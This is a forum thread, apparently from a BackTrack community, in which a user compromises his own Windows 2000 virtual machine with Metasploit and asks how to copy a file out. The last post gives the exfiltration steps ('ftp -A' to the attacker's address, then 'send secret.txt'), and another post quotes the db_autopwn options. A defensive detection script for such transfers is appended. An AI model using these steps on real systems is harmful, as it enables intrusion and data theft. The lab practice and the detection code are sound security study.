Thread: What to do with cmd

  1. #1
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    4

    What to do with cmd

    so...... I run FC10 on my laptop with Windows 2000 on VirtualBox. I don't run back track, sorry guys. I wrote a textfile named secret.txt on the Windows box and saved it to C:. The object of the game was to retrieve it from FC10 pretending I knew no passwords and changing no settings on the windows box.

    I've almost got it. Using metasploit I can get the cmd prompt on the Windows box but then I don't know what else to do. I've tried using tftp to grab the secret txt and tried to start a telnet server to connect to.

    All that happens when I type commands in the remote cmd is that they get echoed but that's it. I know they work on the machine though cause if I run them from the VBox machine they start fine.

    So basically, I don't know what else to do once I get a shell...... I've googled my ass off on how to download files using cmd (or upload them) to no avail. I've been lurking here for a long time and generally find the solutions to my questions on my own but I'm just stuck on this one. Ironic.... seems like this would be the easy part.

  2. #2
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    4

    oh... and p.s. When you run db_autopwn is there a command that displays what exploits/payloads got you your sessions so that you know what to patch/fix??

  3. #3
    Moderator KMDave
    Join Date
    Jan 2010
    Posts
    2,281

    Quote Originally Posted by Lithium@Revenge View Post
    so...... I run FC10 on my laptop with Windows 2000 on VirtualBox. I don't run back track, sorry guys.
    And you are posting in a forum for BackTrack, sorry guy.

    It is quite easy, just think about which other methods are there for transferring files.

    Edit: And you didn't even take the time to read the forum rules
    Tiocfaidh ár lá

  4. #4
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    4

    Quote Originally Posted by KMDave View Post
    And you are posting in a forum for BackTrack, sorry guy.

    It is quite easy, just think about which other methods are there for transferring files.

    Edit: And you didn't even take the time to read the forum rules
    Okay.... now I read the rules I have tried running everything I can think of on a windows box that can use a command line and I just don't get it. Tried to download files with iexplore, telnet, tftp...... what else is there that comes with the windows box?? I doubt that xcopy will copy files across the network. Maybe. Worth looking into?? Idk.

    If I could I would use meterpreter but I can never "deliver" it as a payload. I can make the meterpreter.exe and just load it on the machine but that kind of defeats the purpose.


    Maybe the problem is I just don't know anything about windows...... All I ever use is Linux and I know how to work a linux shell. (WOW.... I'm opposite of all the other noobs)

    and if it makes you feel any better, I do have bt3 on VirtualBox... though I've probably only booted it twice since I installed it but I suppose I could boot it up and just metasploit there if it would make this thread more relevant.

    Guess I'll do some more googling. Maybe I'm just not using the right search terms. Usually google is my best friend.

    :::::::::::::::::::::::EDIT::::::::::::::::
    Well, I found one solution is to start an ftp server on my linux box and then connect with the FTP command from the windows cmd prompt and then transfer secret.txt . Haven't tried yet but it seems like it should work. Didn't even know cmd had a ftp command. Sweet.

  5. #5
    Member floyd
    Join Date
    Mar 2009
    Posts
    231

    Quote Originally Posted by Lithium@Revenge View Post
    oh... and p.s. When you run db_autopwn is there a command that displays what exploits/payloads got you your sessions so that you know what to patch/fix??
    Because I got off the right foot today and I was googling for exactly the same for about one hour today (and at the end found it in this forum) I help you with that:

    <spoonfeed_on>
    session -l -v
    or was it
    session -i <number> -v
    I've already forgotten but I'm sure you will figure it out
    <spoonfeed_off>
    Auswaertsspiel

  6. #6
    Super Moderator Archangel-Amael
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Quote Originally Posted by Lithium@Revenge View Post
    Didn't even know cmd had a ftp command. Sweet.
    You mean windows has an ftp client that works on the command line.
    Any rate why not try out nc ? It should work too.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  7. #7
    Moderator KMDave
    Join Date
    Jan 2010
    Posts
    2,281

    Quote Originally Posted by archangel.amael View Post
    You mean windows has an ftp client that works on the command line.
    Any rate why not try out nc ? It should work too.
    I guess because NC doesn't come with cmd
    Tiocfaidh ár lá

  8. #8
    My life is this forum thorin
    Join Date
    Jan 2010
    Posts
    2,629

    OMG this screams SCRIDDIE!

    It's a text file, if you have command prompt just
    Code:
    type secret.txt
    then copy/paste from the command prompt screen.

    It doesn't get much easier.

    If you actually need to transfer the file then set up an ftp server on your "attacking" machine (or anywhere else you can get the file) and ftp from the victim machine to your server.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  9. #9
    Junior Member
    Join Date
    Mar 2009
    Posts
    83

    Quote Originally Posted by Lithium@Revenge View Post
    oh... and p.s. When you run db_autopwn is there a command that displays what exploits/payloads got you your sessions so that you know what to patch/fix??
    msf > db_autopwn
    [*] Usage: db_autopwn [options]
    -t Show all matching exploit modules
    -x Select modules based on vulnerability references
    -p Select modules based on open ports
    -e Launch exploits against all matched targets
    -r Use a reverse connect shell
    -b Use a bind shell on a random port
    -h Display this help text

    As far as I know, I haven't seen a command that'll show you what exploit worked... You could just go back and read and see what worked and what didn't. Though that would be a pain. Or you can scan the target and figure out which exploits work and what don't. Try and learn what is going on, then you can go and be lazy =)

  10. #10
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    4

    Quote Originally Posted by laffing_man View Post
    As far as I know, I haven't seen a command that'll show you what exploit worked... You could just go back and read and see what worked and what didn't. Though that would be a pain. Or you can scan the target and figure out which exploits work and what don't. Try and learn what is going on, then you can go and be lazy =)
    the command is "sessions -l -v" ...... tells you what exploit worked and is previously mentioned in this thread.

    The point was just to be able to see if I could get the file..... and I did. Doesn't matter that it was a text file. Hell, I wrote it so I already knew what it said. Secret.txt was just symbolic. Just wanted to see if I could actually do it. And yes, I suppose I am a script kiddie but I do read (A LOT) to learn exactly how the exploits work (buffer overflow is a good example, read a lot about that one) and I am currently trying to learn how to write my own (you know, checking in the debugger where the code starts, where it crashes, and what addresses those are at. IDK it all yet... still reading)

    Thanks everybody for your input..... you in particular dave.... that simple comment "just think about which other methods are there for transferring files" made the difference. I was thinking the wrong way.

    Oh... and just in case for the search engines.... YES FTP worked great. Set up an FTP server on your box and then from the remote cmd "ftp -A 192.168.xx.xx" and after you connect use "send secret.txt" and there it is in your ftp folder. I set up an anon ftp server but you can set one up being a user if you want. Works for me so that my gf can upload and download .mp3's onto my laptop without username and password.
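
Added example, not part of any post in this thread: a defender-side check for the transfer described above, flagging a built-in transfer client (`ftp.exe`, `tftp.exe`) started from a `cmd.exe` that has no interactive desktop ancestor. The records are constructed and simplified (the field names `pid`, `ppid`, `image`, `cmd` and the use of `explorer.exe` as the interactive root are assumptions, not a real log schema), and PID reuse is ignored.

```python
# Constructed, simplified process-creation records (not a real log schema).
EVENTS = [
    {"pid": 400, "ppid": 8, "image": "services.exe", "cmd": "services.exe"},
    {"pid": 612, "ppid": 400, "image": "svchost.exe", "cmd": "svchost.exe"},
    {"pid": 900, "ppid": 612, "image": "cmd.exe", "cmd": "cmd.exe"},
    {"pid": 904, "ppid": 900, "image": "ftp.exe", "cmd": "ftp -A 192.168.xx.xx"},
    {"pid": 300, "ppid": 8, "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 950, "ppid": 300, "image": "cmd.exe", "cmd": "cmd.exe"},
    {"pid": 951, "ppid": 950, "image": "ftp.exe", "cmd": "ftp ftp.example.com"},
]

TRANSFER_TOOLS = {"ftp.exe", "tftp.exe"}  # built-in clients named in the thread
INTERACTIVE_ROOTS = {"explorer.exe"}      # assumption: desktop shells start here


def ancestry(pid, by_pid):
    """Return image names from the process's parent up to the oldest known one."""
    chain, seen = [], set()
    ppid = by_pid[pid]["ppid"]
    while ppid in by_pid and ppid not in seen:  # 'seen' guards against loops
        seen.add(ppid)
        chain.append(by_pid[ppid]["image"].lower())
        ppid = by_pid[ppid]["ppid"]
    return chain


def suspicious_transfers(events):
    """Flag transfer clients run from a shell with no interactive ancestor."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if e["image"].lower() not in TRANSFER_TOOLS:
            continue
        chain = ancestry(e["pid"], by_pid)
        if "cmd.exe" in chain and not INTERACTIVE_ROOTS & set(chain):
            reasons = ["non-interactive shell: " + " <- ".join(chain)]
            if "-a" in e["cmd"].lower().split():
                reasons.append("anonymous login (-A)")
            findings.append((e["pid"], e["cmd"], reasons))
    return findings


if __name__ == "__main__":
    for pid, cmd, reasons in suspicious_transfers(EVENTS):
        print(pid, cmd, "; ".join(reasons))
```
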
